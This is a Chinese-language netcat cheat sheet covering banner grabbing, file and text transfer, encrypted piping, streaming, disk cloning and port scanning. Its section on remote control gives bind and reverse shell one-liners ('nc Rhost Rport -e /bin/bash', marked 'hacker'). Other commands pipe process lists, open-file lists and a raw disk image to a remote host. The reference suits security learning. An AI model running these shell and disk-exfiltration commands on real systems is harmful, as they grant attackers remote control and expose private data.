1、NC(NETCAT)
NC分为被动监听/主动连接模式
1.telnet/获取banner信息
nc -nv 192.168.1.1 80
nc -nv ip port
#-n 参数为不进行dns解析
#-v 显示详细信息
2.传输文本
服务端:nc -lvp 4444
#-l 监听模式
#-p 设置监听端口
客户端:nc -nv 192.168.1.1 4444
nc -lvp 333 > ps.txt
ps -aux | nc -nv 192.168.1.1 333 -q 1
#-q 1 传输完毕后延迟1秒后退出
nc -lvp 333 > lsof.txt
lsof | nc -nv 192.168.1.1 333 -q 1
#lsof 列出当前系统打开文件
#ps 列出当前用户进程
3.传输文件/目录
nc -lvp 6666 > 1.mp4
nc -nv 192.168.1.1 6666 < 1.mp4 -q 1
或
nc -lvp 6666 < 1.mp4
nc -nv 192.168.1.1 6666 > 1.mp4
tar -cvf - music/ | nc -lvp 333 -q 1
nc -nv 192.168.1.1 333 | tar -xvf -
4.加密传输
nc -lvp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
mcrypt --flush -Fbq -a rijndael-256 -m ecb < 1.mp4 | nc -nv 192.168.1.1 -q 1
5.远程控制(通过NC反弹shell)
Linux主机反弹shell
正向:
nc -lvp Lport -e /bin/bash
nc Rhost Rport //hacker
反向:
nc Rhost Rport -e /bin/bash
nc -lvp Lport //hacker
Windows主机需要将bash改为cmd
6.加密流量
参考加密传输
未加密抓包抓到的是明文
7.流媒体服务器
nc.exe -lvp 6666 < 1.mp4
nc -nv 192.168.198.1 6666 | mplayer -vo x11 -cache 3000 -
8.远程克隆硬盘
远程取证,可以克隆目标服务器硬盘,或内存
nc -lvp 333 | dd of=/dev/sda
dd if=/dev/sda | nc -nv 192.168.1.1 333 -q 1
9.端口扫描
nc -nvz 192.168.1.1 1-65535
#TCP扫描
nc -nvzu 192.168.1.1 1-1024
#UDP扫描